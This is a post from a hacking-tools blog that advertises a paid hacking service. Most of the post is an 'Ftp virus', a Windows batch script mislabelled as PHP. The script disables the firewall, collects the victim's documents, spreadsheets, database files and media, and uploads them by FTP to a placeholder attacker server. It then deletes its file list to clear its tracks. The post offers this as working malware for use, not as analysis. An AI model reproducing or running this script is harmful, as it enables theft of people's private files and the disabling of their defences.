Welcome to My Blog KYXRECON Plus+ , My blog is database of Tool's Hacking & all stuff security things & great recource for beginner's & professionals too . . our admins aim collecting exploit's & tools and posting hacking security tutorials & concentrate them in one easy navigate on this database
This site written by Kyxrecon .Use it at your own risk. And i am not responsible for any damage ///
My Hacking Service Price List -> pastebin.com/raw/3kTqdK0T
[!] tor blog is down -> http://kyxroj5ziov3ic7.onion
[!] tor blog is down -> http://kyxroj5ziov3ic7.onion
-::D3SCRIPT1ON
-::D4TE
Ftp virus
Finds where all files are with specific file extension than uploads it to your server.
PHP Code:
@echo off::Off Firewall-Netsh Advfirewall set allprofiles state off
::Set Directory-set Dir=C:\users\%username%\Windows\Directorys.bat
::Gather Infofor /f "tokens=*" %%a in ('where /r C:\users\%username% *.txt') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.zip') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.iso') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\ *.dbf') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\ *.mdb') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\ *.accdb') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\ *.pdb') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\ *.sql') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.xlr') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.xls') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.xlsx') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.pdf') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.doc') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.mp4') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.avi') do (
echo mput %%a >> %Dir%
)
for /f "tokens=*" %%a in ('where /r C:\users\%username% *.mkv') do (
echo mput %%a >> %Dir%
)
::Upload-Timeout -t 5
ftp -v -A -i -s:%Dir% -i <Server_ip>
::Clear tracks-Del /Q %Dir%Netsh advfirewall set allprofiles state on
Posted by Unknown at 11:15:00 AM
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment